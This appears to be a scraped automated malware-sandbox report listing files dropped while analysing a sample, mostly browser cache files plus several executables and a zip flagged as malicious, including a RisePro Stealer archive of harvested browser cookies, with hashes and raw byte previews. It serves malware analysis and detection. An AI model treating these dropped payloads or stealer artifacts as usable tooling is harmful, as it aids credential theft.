                                                                                                                                                                                  Preview:c.!.........e...e...F.A.e...........a,~1708515000,:https://incoming.telemetry.mozilla.org/submit/firefox-desktop/messaging-system/1/5e16a81f-1e89-4191-ac33-8ab19a08b66f.strongly-framed.1.security-info.FnhllAKWRHGAlo+ESXykKAAAAAAAAAAAwAAAAAAAAEaphjojH6pBabDSgSnsfLHeAAAAAgAAAAAAAAAAAAAAAAAAAAEAOQFmCjImkVxP+7sgiYWmMt8FvcOXmlQiTNWFiWlrbpbqgwAAAAAAAAX1MIIF8TCCA9mgAwIBAgIQAeBji5rfnEKbkKRvGDdhcDANBgkqhkiG9w0BAQsFADCBkjELMAkGA1UEBhMCVVMxEzARBgNVBAgMCkNhbGlmb3JuaWExFjAUBgNVBAcMDVNhbiBGcmFuY2lzY28xKjAoBgNVBAoMIVRoZSBVbml2ZXJzZSBTZWN1cml0eSBDb21wYW55IEx0ZDEqMCgGA1UEAwwhVGhlIFVuaXZlcnNlIFNlY3VyaXR5IENvbXBhbnkgTHRkMB4XDTI0MDIyMDExMzA0MVoXDTI1MDIxOTExMzA0MVowgYExCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlhMRYwFAYDVQQHEw1TYW4gRnJhbmNpc2NvMRwwGgYDVQQKExNNb3ppbGxhIENvcnBvcmF0aW9uMScwJQYDVQQDEx5pbmNvbWluZy50ZWxlbWV0cnkubW96aWxsYS5vcmcwggEgMA0GCSqGSIb3DQEBAQUAA4IBDQAwggEIAoIBAQC6fSGp+3k/jYV0wKkW3gQZCsFMiAetEX3hSKGyBO522ckT4qIKL2PhqeOVfpasu6OKrBlaTER1jL9E7t7Fe1dm9pM4RfkTRwojdnStBkZhLEAthazf5IuZoKClyIQOBeB

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\F96A1A8368D3C3DD1FA81D170326E6C1C65D342F

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 21464, version 1.0
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):29733
                                                                                                                                                                                  Entropy (8bit):7.848483910426049
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:kNMw20ZcZdIR049weTGXkBXju/W4irYjhPC09oOtbMDa9HVZycTvwxNTGu62MtVJ:UaxmXXSdiQPCjMvyugNiuxMtVpD0La82
                                                                                                                                                                                  MD5:41791893B5000F2113DE4EE0DA4D1CB1
                                                                                                                                                                                  SHA1:228527234877CF7FDD66D36BBF5A041D06697C28
                                                                                                                                                                                  SHA-256:9EB2CCF76817A532E58109DDFA875AF711705AF5761F327F3B6B51F8169E2588
                                                                                                                                                                                  SHA-512:1A27B51AC3470CAE817366747EA33892601E97D7B42EACDB94FB689381BB254CF9C517B257AE50FE2EE612935C6C2D8F19BA2BD566730192EB591C4E92465BC6
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:wOF2......S...........St.............................*....`..~..<..u.....H........6.$..|. ..r..K..........V...@yF#b...>.[<;P..@*.....OINd(...T...C..T.w.s.b..$.....6+. ....R8E$..o..f."MD.@T"...fH..fX..O....AA..F*....+v.Q(KpXF..U"..x@...3|l..E..<.O..~..5M}.".q.#Y9....c.o.s...M.Cr..Dt.,..CtI.O..{D......H..*.+>*K..:.Y..-.l.v......'.....^.Y.k..E..c..~..S..P0.@.....<.!(.P.u.g.2....y..y..Z...v.^..lu.dC.a..o....{.o....h3A.K.I..-.O,..}.c>....Q1]....($..........s..b.X..........CJ.+..4.gE4T.S.*{g......(^...bA,...~..R..p...<G."..y.G...k..*'...i.u....I..S....\.......e$..m.2...{K........V......{me.%.}...P3...{.T..i..Av...K..g.... ...R..n..{m....t@Z....1A.H.2...^..R5)..4}..(...T......=...Pg...Y....y..e.$...]U..0.....8..Fs.(..O.....&..f,g..5..1.yo9..:cy...e..A.......i...i...G..4`)..#j.<+..{ai..[..[~.(,......X......3.f.m+3...B......_D.F.X.i.Y#.X......}_.d..`.i..i......T...7v..A.......?..c..~..g..w.D.H)%..B.!.......:.....ZE{........m.FN.....k...0.X...

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\FB2513E7AAAD15ACF3C8439230F99BF6264363C7

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8047
                                                                                                                                                                                  Entropy (8bit):6.0392906116054945
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:SFMdWebgQX2GZaRZEyFYpoGAVQUy0tikpxgMIRGXpMbm5uZGebZovEckTLUcuTLc:SuWebV2GZuZrFK0k0t7qW0NbZovEpoc
                                                                                                                                                                                  MD5:CA64A44546537CB19AD0E6411D6819E8
                                                                                                                                                                                  SHA1:6B406A6D7C861F2FB827663E2A14F3DA265ACC06
                                                                                                                                                                                  SHA-256:994B37BEE509A1545D72CFCC5F7AEF04471018A2CE6479FDD236DE9CC639D1FB
                                                                                                                                                                                  SHA-512:C192B1C9911A6904BC57088E89566BB3EBB30B7B2B1D58D60926797F43C577A84F1F70A0A3FD4509FF5B5681D7A818BACA0EF845971D6BC0E237F194819DA673
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:yWB.........e...e...F.A.e......}....a,~1708514991,:https://incoming.telemetry.mozilla.org/submit/firefox-desktop/top-sites/1/d3698c60-da91-4f8c-b7c7-e14b40be8bb1.strongly-framed.1.security-info.FnhllAKWRHGAlo+ESXykKAAAAAAAAAAAwAAAAAAAAEaphjojH6pBabDSgSnsfLHeAAAAAgAAAAAAAAAAAAAAAAAAAAEAOQFmCjImkVxP+7sgiYWmMt8FvcOXmlQiTNWFiWlrbpbqgwAAAAAAAAX1MIIF8TCCA9mgAwIBAgIQAeBji5rfnEKbkKRvGDdhcDANBgkqhkiG9w0BAQsFADCBkjELMAkGA1UEBhMCVVMxEzARBgNVBAgMCkNhbGlmb3JuaWExFjAUBgNVBAcMDVNhbiBGcmFuY2lzY28xKjAoBgNVBAoMIVRoZSBVbml2ZXJzZSBTZWN1cml0eSBDb21wYW55IEx0ZDEqMCgGA1UEAwwhVGhlIFVuaXZlcnNlIFNlY3VyaXR5IENvbXBhbnkgTHRkMB4XDTI0MDIyMDExMzA0MVoXDTI1MDIxOTExMzA0MVowgYExCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlhMRYwFAYDVQQHEw1TYW4gRnJhbmNpc2NvMRwwGgYDVQQKExNNb3ppbGxhIENvcnBvcmF0aW9uMScwJQYDVQQDEx5pbmNvbWluZy50ZWxlbWV0cnkubW96aWxsYS5vcmcwggEgMA0GCSqGSIb3DQEBAQUAA4IBDQAwggEIAoIBAQC6fSGp+3k/jYV0wKkW3gQZCsFMiAetEX3hSKGyBO522ckT4qIKL2PhqeOVfpasu6OKrBlaTER1jL9E7t7Fe1dm9pM4RfkTRwojdnStBkZhLEAthazf5IuZoKClyIQOBeBlo99E8h

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\FE1F5B94E735CF25E43C634E82ECB06C772BE012

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):7044
                                                                                                                                                                                  Entropy (8bit):6.030728847493467
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:1bLryG5lPXMcq0ej6FzfryG5lPXMcq0ej6FzHehQgMxFJz48t8QkciiZFPPnnq7y:trJPPXBrrJPPXBC8jjt8+RZFPPqYWM
                                                                                                                                                                                  MD5:81D587EF9CD68793A16CC101C641293E
                                                                                                                                                                                  SHA1:B7CE2A3F73C3FA578667ECC4E9169C699FCE4042
                                                                                                                                                                                  SHA-256:3BB76C24702C89281E0CAC5D6E711042E686067F1A9A99F8378504EC816EF5DE
                                                                                                                                                                                  SHA-512:1BAACB805C148F3ED4E92B81E007D64E60199F53624FD2CB5B690FBA7F9EB6D6ECB3CC00175DB1C22BA936278DC3FCD5A002C71A8B4AEB7FA1C2C71E27A4D8A8
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:............e...e...F.B.e......J....O^partitionKey=%28https%2Cyoutube.com%29,:https://i.ytimg.com/generate_204.necko:classified.1.strongly-framed.1.security-info.FnhllAKWRHGAlo+ESXykKAAAAAAAAAAAwAAAAAAAAEaphjojH6pBabDSgSnsfLHeAAAAAgAAAAAAAAAAAAAAAAAAAAEAOQFmCjImkVxP+7sgiYWmMt8FvcOXmlQiTNWFiWlrbpbqgwAAAAAAAAW9MIIFuTCCA6GgAwIBAgIRAJEGaeSZHqW6EGgobj6kNcYwDQYJKoZIhvcNAQELBQAwgZIxCzAJBgNVBAYTAlVTMRMwEQYDVQQIDApDYWxpZm9ybmlhMRYwFAYDVQQHDA1TYW4gRnJhbmNpc2NvMSowKAYDVQQKDCFUaGUgVW5pdmVyc2UgU2VjdXJpdHkgQ29tcGFueSBMdGQxKjAoBgNVBAMMIVRoZSBVbml2ZXJzZSBTZWN1cml0eSBDb21wYW55IEx0ZDAeFw0yNDAyMjAxMTI5MjNaFw0yNTAyMTkxMTI5MjNaMBkxFzAVBgNVBAMTDmVkZ2VzdGF0aWMuY29tMIIBIDANBgkqhkiG9w0BAQEFAAOCAQ0AMIIBCAKCAQEAun0hqft5P42FdMCpFt4EGQrBTIgHrRF94UihsgTudtnJE+KiCi9j4anjlX6WrLujiqwZWkxEdYy/RO7exXtXZvaTOEX5E0cKI3Z0rQZGYSxALYWs3+SLmaCgpciEDgXgZaPfRPIbM0q34z636VMS44QKfkO+MV1sI0/TfHUyF4+hPPtA34YHqivqRx8kcEFh56uOBdedAe62+VTkRzQBcnXt/fNZx3yitUB08z0a3TS2t/tLZ4GbGG9e2pXtIIupGUqicgdai16RXoHhCmUkBVEBnm0SMfUw76AXdPlv4UkSbHiRRp

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\entries\FFF0EE80A7D08042500138AB06E942888FBC75EE

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):15578
                                                                                                                                                                                  Entropy (8bit):5.7650091048309795
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:YwkRd30V6h7UMQ3GEIsDTaId8WdHe8aDWdHe8at:Ywsd3s6cGEIga8/d+8aid+8at
                                                                                                                                                                                  MD5:EBE80A417074A771AB2DBB6B108F71DC
                                                                                                                                                                                  SHA1:DD0A2BEED3220DE0CA074B654D841B1B15CFBBF6
                                                                                                                                                                                  SHA-256:3CEA91A139FF1BF4E642D0BAB0AAD47E8674E877D5F21D62D8B1747B543CF868
                                                                                                                                                                                  SHA-512:B737EE101A2B6D9F67D202B301449953191F0B5FD0BC5A51135493AE5A9ECED1812068AB295550901D7D29F61C8F53DF8397C12F892194FB3F9C957B3B3A0D2A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:............ .h...&... .... .........(....... ..... ..........................................h. .f...............f...g...d.@.........................`...e...f...f...............f...f...f...e...p...............`...f...f...f...f...............f...f...f...f...f...p...........e...f...f...f...f...............f...f...f...f...f...e.......d.@.f...f...f...f...f...............f...f...f...f...f...f...h. .e...f...f...f....U..........................y'..f...f...f...g...f...f...f...f...............................U..f...f...f...f...f...f...f...f..................................f...f...f...f...f...f...f...f...f...f...............f...f...f...f...f...f...f...f...f...f...f...f...f...............p...f...f...f...f...f...f...f...f...f...f...f...f...................d...U..f...f...f...e...h. .f...f...f...f...f....d......................f...f...f...h.@.....f...f...f...f...f...f....t.................f...f...f...........p...f...f...f...f...f...f...f...f...f...f...f...f...`...............p...f...f...f...f

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\startupCache\scriptCache-child-new.bin

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2029892
                                                                                                                                                                                  Entropy (8bit):4.701156726468159
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12288:+6j+d487l/bpQoykPA1OEiCIuRhRuPoCnE2ZzNYLQhhWiqAg+XdN43Ib+M5TkRYX:AdR7l/bLs6BjUNRYRck
                                                                                                                                                                                  MD5:04F00B709D92A4DC8BF6CDDE6AC3BFAF
                                                                                                                                                                                  SHA1:E8F46721CB9E33A40C55CFA52B08371722FEAA63
                                                                                                                                                                                  SHA-256:62E09ED0E9A8136BF7FDD439BE0CC326C5FD84AA511CCE50C0D4DBB68BA37E06
                                                                                                                                                                                  SHA-512:9DE3CF0A0C752AA529A7F38E2B7FB2070B502925D9017C103C32BD117089F347E20996E2FB3B118EB1219746AACB3F4ACB66FB187B44937331EF3D881F75BB69
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:mozXDRcachev003......I..9.resource://gre/modules/TelemetryControllerContent.sys.mjsU.jsloader/non-syntactic/module/resource/gre/modules/TelemetryControllerContent.sys.mjs.........6.resource://gre/modules/TelemetryControllerBase.sys.mjsR.jsloader/non-syntactic/module/resource/gre/modules/TelemetryControllerBase.sys.mjs.........+.resource://gre/modules/AppConstants.sys.mjsG.jsloader/non-syntactic/module/resource/gre/modules/AppConstants.sys.mjs.&..T....".resource://gre/modules/Log.sys.mjs>.jsloader/non-syntactic/module/resource/gre/modules/Log.sys.mjs8C..Hp...).resource://gre/modules/XPCOMUtils.sys.mjsE.jsloader/non-syntactic/module/resource/gre/modules/XPCOMUtils.sys.mjs.....3...*.chrome://global/content/process-content.jsG.mm/script/resource/gre/chrome/toolkit/content/global/process-content.js@........6.resource://gre/modules/extensionProcessScriptLoader.js>.mm/script/resource/gre/modules/extensionProcessScriptLoader.js ........5.resource://gre/modules/ExtensionProcessScript.sys.mjsQ.j

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\startupCache\scriptCache-new.bin

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):9050156
                                                                                                                                                                                  Entropy (8bit):4.734884325170652
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:CwTv3Dxd4CqeWDc+ikpXGBm5DkG0C6RAuAgdyR+FC2G1Kl/S/qyarN7h//uTl+EL:/v8cW5IBmSAVgdy0n/SSya7/Y+EKm
                                                                                                                                                                                  MD5:C1225D809B1E5A0578AED0CC34A04B99
                                                                                                                                                                                  SHA1:1C7BD973239B984986FCFB77C6FF12AF5047A7FA
                                                                                                                                                                                  SHA-256:7EC32D3BD3BA99FAB0112B0E0B9AD7EBF73BA586ED15C8291A55A446B00935ED
                                                                                                                                                                                  SHA-512:8DA6D17D4A8C500E13E3176B8B872533861501080E4903000CBB546DFD04C9A2A4AA90D4A6C7BD713B7E931B4CC3C962728256150EC209674559A22C628234F2
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:mozXDRcachev003.......]l3.resource://gre/modules/MainProcessSingleton.sys.mjsO.jsloader/non-syntactic/module/resource/gre/modules/MainProcessSingleton.sys.mjs.........5.resource://gre/modules/CustomElementsListener.sys.mjsQ.jsloader/non-syntactic/module/resource/gre/modules/CustomElementsListener.sys.mjs....H....'.resource:///modules/BrowserGlue.sys.mjsF.jsloader/non-syntactic/module/resource/app/modules/BrowserGlue.sys.mjs.........1.resource://gre/modules/ActorManagerParent.sys.mjsM.jsloader/non-syntactic/module/resource/gre/modules/ActorManagerParent.sys.mjs.....R...'.resource://gre/modules/XULStore.sys.mjsC.jsloader/non-syntactic/module/resource/gre/modules/XULStore.sys.mjs.7..x5...1.resource://gre/modules/EnterprisePolicies.sys.mjsM.jsloader/non-syntactic/module/resource/gre/modules/EnterprisePolicies.sys.mjs.m.......7.resource://gre/modules/EnterprisePoliciesParent.sys.mjsS.jsloader/non-syntactic/module/resource/gre/modules/EnterprisePoliciesParent.sys.mjs.s..P....(.resource://gre

                                                                                                                                                                                  C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\startupCache\urlCache-new.bin

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2854
                                                                                                                                                                                  Entropy (8bit):4.80400446161761
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:UxwneU3deLVegWWKmWtoBYjYdYgbbYgbqhNTKWeRryLPZefSyWr9HicStpRtNm7J:UxFU3Wu38qgbkgbIKKRCUOt9Jrq
                                                                                                                                                                                  MD5:AA6DC573C53541F16F0F98644F716147
                                                                                                                                                                                  SHA1:F54D8FB14DDA22C1E997BCBFFF0BBEC87DB5677D
                                                                                                                                                                                  SHA-256:83CAC2D67AA82B33356D48BB5DA3B70D7DE6B1518640AF8E60BCD8B72922ECCB
                                                                                                                                                                                  SHA-512:A244D2B257A66B3D8725920EBD8DD1A482E4E6F7E8F31B4EE2417DD281C71C1811DC8E0D001D9AB1A9DFD9E1AAE1FAAE116C0B65D0E334BE23DF2652B0A2F4A1
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:mozURLcachev003......p..a.C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\xulstore.json.;.C:\Program Files\Mozilla Firefox\distribution\policies.json.3.chrome/browser/content/browser/built_in_addons.json.i.C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\addonStartup.json.lz4.%.chrome/toolkit/content/global/xul.css...res/contenteditable.css.$.chrome/toolkit/res/counterstyles.css...res/designmode.css...chrome/toolkit/res/forms.css...chrome/toolkit/res/html.css...chrome/toolkit/res/mathml.css...chrome/toolkit/res/noframes.css...chrome/toolkit/res/quirk.css.!.chrome/toolkit/res/scrollbars.css...res/svg.css...chrome/toolkit/res/ua.css.0.chrome/en-US/locale/en-US/global/intl.properties.I.chrome/en-US/locale/en-US/mozapps/downloads/unknownContentType.properties.-.chrome/en-US/locale/branding/brand.properties.=.chrome/en-US/locale/en-US/global/layout/htmlparser.properties.1.localization/en-US/toolkit/about/aboutPlugins.ft

                                                                                                                                                                                  C:\Users\user\AppData\Local\RageMP131\RageMP131.exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2328576
                                                                                                                                                                                  Entropy (8bit):7.963129291166755
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:ov+pa5Mxg2VmKxuou1saUJ3iuL+y8g9Rdi8ZNaFwbdwUdUL:1pa5Mx9oKhaKdL+Lgo8ZoF0dw5L
                                                                                                                                                                                  MD5:758C5213C3FFEBE919633188F8C07747
                                                                                                                                                                                  SHA1:FA534E53D645F69D1C950D8FF17E11E877CA970B
                                                                                                                                                                                  SHA-256:B50BECDB79B109E85CAA4F588343FDD7E96152F4E23F40AD213A0336118BC87B
                                                                                                                                                                                  SHA-512:783CEE4A35DAB87271A126B8AE46F41E636FF9AFEB2DC5620723FED828C4C72F991127FF7B8FD1DE287CB8F63B825FE0EBEDA7585B66ACD1411B7050B2F1BDA9
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 39%
                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......C.........L.....L.....L.....H.G...H.....H.....H...R.L.....L.....L...............E.....-........Rich..................PE..L...N@.e...............".....L.......0Z...........@..........................`Z.......#...@.................................T...h....p..h1.......................................................................................................... . .`..........................@....rsrc...h1...p......................@....idata ............................@... ..,.........................@...awogigmw.P....?..D..................@...nkfwixkm..... Z......`#.............@....taggant.0...0Z.."...f#.............@...........................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\RageMP131\RageMP131.exe:Zone.Identifier

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):26
                                                                                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\heidi9NcUyPNf3YG5\idPXKSo93Tb9SEEu9e8w.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1882112
                                                                                                                                                                                  Entropy (8bit):7.949517224812261
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:wLi2wNaeFSEYrdH8UesU02hUv21QLUmRa2obb:oHnDEYrPW0cUvCmz+b
                                                                                                                                                                                  MD5:2C4C8C25D448625A0184403CA56EDB2D
                                                                                                                                                                                  SHA1:61531D43B5ADE8F66FD2409DF1A20902EF1A781E
                                                                                                                                                                                  SHA-256:01024AF50DDAF78F4F6A96B4E537400D4572A47E60CCF542F9EE6771DCDBAC0F
                                                                                                                                                                                  SHA-512:CCF51E10D1AAE0F669B771669F67500E1B7EE712A5078B947D256B57E722244F11F01B018820C4B53D1069137F5F4859E3353D8BE601F4E80AC1ECF939F30368
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*R..n3.@n3.@n3.@5[.A`3.@5[.A.3.@.^.A|3.@.^.Az3.@.^.A.3.@5[.Az3.@5[.A}3.@n3.@.3.@.].Ao3.@.]u@o3.@.].Ao3.@Richn3.@........................PE..L......e.............................@J...........@..........................pJ.....6.....@.................................Vp..j....`........................J...............................J..................................................... . .P..........................@....rsrc........`......................@....idata .....p......................@... ..*.........................@...tfywulqz......0.....................@...prpgnkkw.....0J.....................@....taggant.0...@J.."..................@...................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\175ee1b7-56e5-4b65-bfdd-51ce0c940629.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):11185
                                                                                                                                                                                  Entropy (8bit):7.951995436832936
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                  MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                  SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                  SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                  SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\4enxhe06Yd_3ns7WRVTEXcO.zip

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2759
                                                                                                                                                                                  Entropy (8bit):7.719916586119035
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:9CIaCSXZV//QWGPvcHkLymqxfH5yxHqnKufOefJ4t72DMQLzn3KJ6CAkCTOCksCE:wCYZV//Q1vcHMT4PsxHqwt4nLz3KJ5Y7
                                                                                                                                                                                  MD5:5C6A44264F0FB11A46D7803FACA70931
                                                                                                                                                                                  SHA1:11D6E9F181089D9C4BEF4A8787643A5A312EB457
                                                                                                                                                                                  SHA-256:F72F455990FA4124EFE1AE479A04FD6214530050A85376CB361C1C1AAA318476
                                                                                                                                                                                  SHA-512:E0C4AB9CD2B13446F7314E73D371D2E38C15AA2C8C982F9036416652D41D21131DAEE3B657419FBB10752D7AC0434B4B9EC647DC1F689635507CA67BF3B5CACA
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                  • Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: C:\Users\user\AppData\Local\Temp\4enxhe06Yd_3ns7WRVTEXcO.zip, Author: Joe Security
                                                                                                                                                                                  Preview:PK.........cUX................Cookies\..PK.........cUXA.`%............Cookies\Chrome_Default.txt....@.........i.&h.Cn..L...\.FA@.~..v7..O...%!es.f..../S..a...@.,ek.%.H......</<2..,...I..w......1q.f.F+PiM.=h.5..2....0....O..u_.~}Z.UM........y...Rj..4H..D...xLY@....[.d.c&......G_............j%q%....Y.|.....P...u..u..85/..Z`...-..c...^A8n...Y.3......j.G!....c.....AM@!._W.yQbs.@.....h.y.-......|J..i...r....c....M...E...GS...C....X..C.U..v.%......C,.L0,......5.=....6.....PK.........cUX`.j.L...........information.txt.X.R.F.}w..a.....v...0..]..l..B.dil.d.#.`...5..e..\..g.r.t.H.4K.h........2.y..Ot;..IT.>.Q.:SSD.".O.>.b.;C....BE......2.q...4N.=.0!...&Xv;....F..>.'I...Q...$..X*9._(.....M.Zp.....Ny..$.3"x-.*.u.....A....T>..Tqw..J/..._......Sk........E.......8..&j......]........`s1..B....DR....._.zB.kO..z..i....l.A..Q...Z.?...^,W.*.e...O..Gut..6D.KZ....].Rg..#..^.(..K..W..l......y..".i ..|...=:....*.9..^...{UM....uX.|..k>......:...d@j.n...ST(H...UYj..

                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\EdgeMS131\EdgeMS131.exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\Desktop\I2jCDr35mu.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1882112
                                                                                                                                                                                  Entropy (8bit):7.949517224812261
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:wLi2wNaeFSEYrdH8UesU02hUv21QLUmRa2obb:oHnDEYrPW0cUvCmz+b
